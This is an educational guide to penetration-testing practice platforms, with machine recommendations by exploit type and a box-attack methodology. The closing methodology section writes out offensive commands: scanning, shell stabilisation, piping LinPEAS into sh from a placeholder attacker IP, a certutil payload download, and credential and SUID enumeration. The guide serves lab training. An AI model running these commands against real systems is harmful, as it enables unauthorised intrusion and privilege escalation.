Reading about exploitation is not the same as doing it. Every concept in this guide exists to be practiced — on real vulnerable machines, in real environments, against real services. This section covers every platform worth your time, how to approach them effectively, and which machines to start with based on what you are trying to learn. The methodology at the end applies everywhere — how you approach a box matters as much as what techniques you know.
🔰 Beginners: Start with HackTheBox Starting Point or TryHackMe. Both are designed for people who are new and provide guided paths. Do not start with a hard box and get discouraged — the easy boxes teach everything you need to progress.
⚡ Seasoned practitioners: The machine curation by exploit type and the Pro Labs section are the most relevant parts. Skip to Machine Curation for the indexed list.
Before you start — know these terms:
- Retired machine — a box that has been taken out of active rotation on HTB. Walkthroughs and writeups are publicly available. Good for learning because you can get help when stuck.
- Active machine — currently on the platform. No official writeups — you are on your own. Points count toward rank.
- Starting Point — HTB's guided beginner path. Machines come with questions that walk you through the techniques step by step.
- VIP — paid tier on HTB. Gives access to all retired machines and less crowded servers.
- Pro Labs — full simulated enterprise networks on HTB. Multiple machines, Active Directory, realistic corporate environments.
- HackTheBox
- TryHackMe
- HackTheBox Academy
- PentesterLab
- OffSec Proving Grounds
- VulnHub
- PortSwigger Web Security Academy
- Machine Curation by Exploit Type
- How to Approach a Box — The Methodology
- Tracking Your Progress
What it is: The industry standard for CTF-style penetration testing practice. Individual machines running real operating systems with real services, each designed around a specific exploitation path or chain. Completing boxes builds technical skill faster than almost anything else.
URL: hackthebox.com
Free tier:
→ Access to active machines
→ Starting Point machines (guided)
→ Limited retired machine access
→ Shared servers
VIP ($14/month):
→ All retired machines
→ Dedicated servers (less lag, more reliable)
→ Essential for serious practice
VIP+ ($20/month):
→ Everything in VIP
→ Access to more Pro Labs
→ Priority support
Starting Point is HTB's guided beginner path. Each machine comes with a series of questions that walk you through the exploitation steps. This is not hand-holding — it is structured learning that builds methodology.
Tier 0 — Absolute beginner:
Meow → Telnet, default credentials
Fawn → FTP enumeration, anonymous login
Dancing → SMB enumeration, null session
Redeemer → Redis, unauthenticated access
Explosion → RDP, default credentials
Preignition → Web enumeration, default credentials
Tier 1 — Basic exploitation:
Appointment → SQL injection, basic web
Sequel → MySQL, SQL fundamentals
Crocodile → FTP + web, credential reuse
Responder → LLMNR/NBT-NS poisoning, Windows
Three → S3 bucket, cloud basics
Ignition → Web, default credentials
Tier 2 — Intermediate chains:
Archetype → MSSQL, xp_cmdshell, Windows privesc
Oopsie → Web, IDOR, SUID privesc
Vaccine → SQL injection, config files, sudo
Unified → Log4Shell CVE-2021-44228
Included → LFI, TFTP, LXD privesc
Markup → XXE, Windows scheduled tasks
Base → Web, login bypass, SUID privesc
Easy machines:
→ One or two steps to user, one step to root
→ One main vulnerability — find it, exploit it
→ Good for practicing specific techniques
Medium machines:
→ Usually a chain of 2-3 vulnerabilities
→ Require enumeration across multiple services
→ More realistic than easy boxes
Hard machines:
→ Complex chains, custom exploits, obscure techniques
→ May require modifying public exploits significantly
→ Sometimes require developing tools or scripts
Insane machines:
→ Intended for experienced practitioners
→ Often involve cutting-edge CVEs or novel techniques
→ Can take days — not appropriate for beginners
Pro Labs are full network environments, not single machines. They simulate realistic corporate environments with Active Directory, multiple interconnected hosts, and real-world attack paths.
Dante → Beginner-friendly network, pivoting basics
→ Good first Pro Lab after some HTB experience
Offshore → Intermediate, Active Directory focused
→ Realistic corporate network simulation
RastaLabs → Advanced, heavy Active Directory exploitation
→ Credential attacks, lateral movement, persistence
Cybernetics → Advanced, modern enterprise simulation
→ EDR, AV, advanced defense bypass required
APTLabs → Expert level, APT simulation
→ Nation-state level techniques required
What it is: Browser-based learning platform focused on guided learning paths. Machines can be accessed directly in the browser without a VPN. Better for absolute beginners than HTB because of the structured guided approach.
URL: tryhackme.com
No VPN setup required — browser-based machines
Guided rooms with step-by-step instructions
Learning paths organized by topic and skill level
More explanations alongside the challenges
Free tier is generous — many rooms completely free
Complete Beginner:
→ Linux Fundamentals (3 parts)
→ Web Fundamentals
→ Network Fundamentals
→ How The Web Works
Pre-Security:
→ Introduction to Cybersecurity
→ Network Security
→ Web Application Security
Jr Penetration Tester:
→ Full path covering methodology through reporting
→ Hands-on rooms for each technique
→ Certificate on completion
SOC Level 1:
→ Defensive side — understanding what defenders see
→ Valuable context for offensive practitioners
Buffer Overflow Prep → Classic Windows BoF practice
Steel Mountain → HackTheBox-style Windows box
Blue → EternalBlue (MS17-010) exploitation
Ice → Windows exploitation chain
Relevant → Windows enumeration and exploitation
Skynet → Linux web exploitation chain
Mr Robot CTF → Fun themed Linux box
RootMe → Basic Linux web shell upload
Simple CTF → Beginner Linux box
Pickle Rick → Fun beginner web box
What it is: HTB's structured learning platform. Not CTF boxes — theory and guided modules with hands-on exercises. Think of it as the textbook that goes alongside the practice.
URL: academy.hackthebox.com
Penetration Testing Process → Full methodology overview
Network Enumeration with Nmap → Everything nmap
Footprinting → Comprehensive enumeration techniques
Information Gathering → OSINT and passive recon
Vulnerability Assessment → Finding and prioritizing vulns
Web Requests → HTTP fundamentals
Web Application Attacks → SQLi, XSS, command injection, LFI
Attacking Web Applications with Ffuf → Web fuzzing
File Upload Attacks → File upload exploitation
SQL Injection Fundamentals → SQLi from zero
Linux Privilege Escalation → Full privesc methodology
Windows Privilege Escalation → Full Windows privesc
Active Directory Enumeration and Attacks → AD fundamentals
Password Attacks → Credential attacks, hash cracking
Shells and Payloads → Shell generation and management
Introduction to Assembly → Understand what exploits do
Stack-Based Buffer Overflows (Linux) → Linux BoF
Stack-Based Buffer Overflows (Windows) → Windows BoF
What it is: Web application security focused practice platform. Exercises are organized by vulnerability class with excellent explanations of the underlying concepts. Strong on web vulnerabilities and cryptography.
URL: pentesterlab.com
Excellent explanations alongside exercises
Organized by CVE and vulnerability class
Real web application vulnerabilities — not contrived
Strong cryptography and encoding exercises
Good for web-focused practitioners
Pro subscription required for most content (~$20/month)
Web for Pentester I & II → Comprehensive web basics
SQL Injection → Every SQLi type with explanation
File Upload → Upload bypass techniques
XXE → XML External Entity exploitation
Padding Oracle → Cryptographic attack
JWT → JSON Web Token attacks
Code Execution → RCE techniques
What it is: OffSec's practice platform — the same organization behind OSCP. Two tiers: Play (free) and Practice (paid). Practice machines are the closest thing to OSCP exam machines available.
URL: portal.offsec.com/labs/practice
OffSec maintains it — same difficulty and style as OSCP exam
Practice tier machines are rated Easy/Intermediate/Hard
Community solutions available for retired machines
Essential if preparing for OSCP
More realistic than HTB in terms of OSCP difficulty matching
Play (free):
→ Limited set of machines
→ Community rated boxes
→ Good for casual practice
Practice ($19/month):
→ Full library of machines
→ OffSec-rated difficulty
→ Hints available
→ Essential for OSCP preparation
What it is: Free downloadable vulnerable virtual machines. Run them locally in VirtualBox or VMware. No subscription required — everything is free. Ideal for offline practice or when you want full control over the environment.
URL: vulnhub.com
Completely free — no subscription
Run locally — no VPN, no internet required
Full control — can snapshot and revert anytime
Massive library — hundreds of machines
Community walkthroughs available for all machines
Good for slow, thorough learning without time pressure
# Requirements:
# VirtualBox (free): virtualbox.org
# Or VMware Workstation Player (free): vmware.com
# Download a .ova or .vmdk file from vulnhub.com
# Import into VirtualBox:
# File → Import Appliance → select the .ova file
# Network setup:
# Set the vulnerable VM to Host-Only networking
# Set your Kali VM to Host-Only networking
# Both machines can communicate, neither reaches internet
# Find the target IP:
# Option 1: netdiscover -r 192.168.56.0/24
# Option 2: arp-scan -l
# Option 3: nmap -sn 192.168.56.0/24Beginner:
Kioptrix Level 1 → Classic beginner Linux box
Mr-Robot → TV show themed, 3 flags
Basic Pentesting 1 → Good methodology practice
pWnOS 2.0 → Web application focus
Intermediate:
Brainpan → Buffer overflow focused
SkyTower → SSH, SQL, enumeration chain
HackLAB: Vulnix → NFS, Linux privesc
Stapler → Multiple services, chain
Buffer Overflow Practice:
Brainpan 1, 2, 3 → Dedicated BoF practice machines
dostackbufferoverflowgood → Excellent BoF learning machine
What it is: Free web application security training from the creators of Burp Suite. The most comprehensive free web security learning resource available. Every major web vulnerability class covered with theory, labs, and solutions.
URL: portswigger.net/web-security
Completely free — no subscription required
Best-in-class explanations of web vulnerabilities
Browser-based labs — no setup required
Progressive difficulty — apprentice to expert
Covers every web vulnerability in depth
Certificate of completion available
Server-side vulnerabilities:
→ SQL injection (18 labs)
→ Authentication (14 labs)
→ Path traversal (6 labs)
→ Command injection (5 labs)
→ Business logic vulnerabilities (11 labs)
→ Information disclosure (5 labs)
→ Access control (13 labs)
→ File upload vulnerabilities (7 labs)
→ Server-side request forgery (7 labs)
→ XXE injection (9 labs)
Client-side vulnerabilities:
→ Cross-site scripting (30 labs)
→ Cross-site request forgery (12 labs)
→ Clickjacking (5 labs)
→ DOM-based vulnerabilities (7 labs)
→ WebSockets (3 labs)
Advanced topics:
→ Insecure deserialization (10 labs)
→ GraphQL API vulnerabilities (5 labs)
→ Server-side template injection (7 labs)
→ Web cache poisoning (13 labs)
→ HTTP request smuggling (22 labs)
→ OAuth authentication (6 labs)
→ JWT attacks (8 labs)
→ Prototype pollution (10 labs)
Use this index to find practice machines for specific techniques covered in this guide.
HTB:
Brainfuck → Advanced — Linux BoF component
October → Linux BoF
Pincer → Windows BoF
VulnHub:
Brainpan 1 → Classic Windows BoF — best beginner BoF box
dostackbufferoverflowgood → Excellent teaching machine
Tr0ll 3 → Linux BoF
TryHackMe:
Buffer Overflow Prep → 10 practice targets with guidance
Gatekeeper → Windows BoF
Brainstorm → Windows BoF
HTB Starting Point:
Appointment → Basic SQLi
Sequel → MySQL direct access
HTB:
Nightmare → Advanced SQLi
Magic → SQLi to file upload chain
PortSwigger:
All SQL injection labs → Comprehensive coverage of every type
DVWA (standalone):
SQL Injection module → Multiple difficulty levels
SQL Injection (Blind) module → Boolean and time-based
HTB:
Bashed → Web shell, command injection
Networked → Command injection via file upload
Beep → RCE via multiple paths
TryHackMe:
RootMe → File upload to RCE
Vulnversity → File upload bypass
PortSwigger:
Command injection labs → All injection types
HTB:
Poison → LFI to credential disclosure
Nineveh → LFI chaining
File → LFI focused box
TryHackMe:
File Inclusion → Dedicated LFI/RFI room with guidance
PentesterLab:
File Include exercises → Good explanations alongside labs
HTB:
Gobox → SSRF to AWS metadata
Bucket → SSRF to internal service
Forge → SSRF with filter bypass
PortSwigger:
SSRF labs → All SSRF types including blind
HTB:
Arkham → Java deserialization
Cereal → PHP deserialization
Pikaboo → Deserialization component
PortSwigger:
Insecure deserialization labs → PHP, Java, Ruby coverage
HTB Pro Labs:
Offshore → Intermediate AD network
RastaLabs → Advanced AD exploitation
HTB:
Forest → AD enumeration, AS-REP roasting
Active → Kerberoasting, GPP passwords
Resolute → AD enumeration, DnsAdmins privesc
Sauna → AS-REP roasting, DCSync
Monteverde → Azure AD, password spraying
TryHackMe:
Active Directory Basics → Guided introduction
Attacktive Directory → Intermediate guided AD room
HTB:
Blue → EternalBlue MS17-010
Legacy → MS08-067
Devel → IIS file upload, Windows privesc
Optimum → HFS RCE, Windows privesc
Bastard → Drupal RCE, Windows privesc
Grandpa/Granny → IIS WebDAV exploitation
TryHackMe:
Blue → EternalBlue guided
Steel Mountain → HFS exploitation guided
Ice → Windows exploitation chain
HTB:
Beep → Multiple privesc paths
Bashed → sudo abuse
Cronos → Cron job abuse
Shocker → Shellshock, sudo
Nibbles → Web app, sudo privesc
TryHackMe:
Linux PrivEsc → Dedicated privesc room
Common Linux Privesc → All main techniques
VulnHub:
Kioptrix series → Classic Linux boxes
pWnOS series → Web to root chains
This methodology applies to every platform. Follow it consistently and you will develop the systematic thinking that gets through hard boxes.
# Step 1 — Quick scan to see what is there
nmap -sV -sC --top-ports 1000 TARGET_IP -oN quick.txt
# Step 2 — Full port scan running in background
nmap -sV -sC -p- --min-rate 5000 TARGET_IP -oN full.txt &
# Step 3 — UDP scan for key ports
nmap -sU --top-ports 20 TARGET_IP -oN udp.txt &
# Step 4 — While scans run, enumerate what you already found
# Web on 80/443?
gobuster dir -u http://TARGET_IP \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,html,txt,bak -o gobuster.txt
# FTP on 21?
ftp TARGET_IP # try anonymous / anonymous
# SMB on 445?
smbclient -L //TARGET_IP -N
enum4linux -a TARGET_IP# For each service found:
# 1. Note the exact version
# 2. Search for vulnerabilities
searchsploit SERVICE VERSION
# 3. Google: SERVICE VERSION exploit
# 4. Check if Metasploit has a module
msfconsole -q -x "search SERVICE; exit"
# Prioritize:
# → RCE vulnerabilities over information disclosure
# → Unauthenticated over authenticated
# → Public exploit available over manual research required# Try the most promising vector first
# Follow the exploit exactly as written initially
# If it fails — debug systematically (see when-it-fails/debugging.md)
# When you get a shell:
# 1. Stabilize immediately
python3 -c 'import pty; pty.spawn("/bin/bash")'
# 2. Grab the flag (CTF)
cat /home/*/user.txt 2>/dev/null
# 3. Confirm your position
whoami && id && hostname# Linux — automated enumeration first
# Upload and run LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or upload manually
# On your machine:
python3 -m http.server 80
# On target:
curl http://YOUR-IP/linpeas.sh | sh
# Manual checks alongside automated:
sudo -l # what can you run as sudo?
find / -perm -4000 2>/dev/null # SUID binaries
crontab -l && cat /etc/crontab # cron jobs
cat /etc/passwd | grep -v nologin # users with shells
ls -la /home/ # other user home directories
# Windows — automated enumeration
# Upload and run WinPEAS
# From your machine: python3 -m http.server 80
# On target: certutil -urlcache -f http://YOUR-IP/winPEAS.exe winpeas.exe
# Run: .\winpeas.exe# After completing the box:
# 1. Write up what you found in order
# 2. Note what you tried that did not work and why
# 3. Note what you would do differently
# 4. Screenshot or log key commands and outputs
# A box you completed and documented
# is worth 10 boxes you completed and forgotWhat to track:
For each box completed:
□ Platform and machine name
□ Difficulty rating
□ Date completed
□ Initial access technique used
□ Privilege escalation technique used
□ Key lessons learned
□ Time taken
□ Did you get stuck? Where? How did you get unstuck?
Why tracking matters:
Most people complete boxes and move on. Three months later they cannot remember how they got through a specific technique or what they learned. A simple log — even just a text file or a notes app — turns individual box completions into a searchable knowledge base.
The writeup habit:
Writing a walkthrough of a completed box is the single most effective way to consolidate learning. You do not have to publish it. Writing it for yourself forces you to articulate every step — and gaps in your understanding show up immediately when you cannot explain what you did and why.
Minimum writeup structure:
1. What services were running
2. How you got initial access — technique (what worked and what didn't)
3. How you escalated privileges — technique (what worked and what didn't)
4. What you learned
5. What you would do faster next time (where did you waste time)
| Resource | What It Covers |
|---|---|
| Vuln Research | Finding exploits for what you discover |
| Manual Exploitation | Running exploits when automated fails |
| Shells | Getting and keeping access |
| When It Fails | Getting unstuck on boxes |
| Exploit Categories | Deep dives on every technique |
by SudoChef · Part of the SudoCode Pentesting Methodology Guide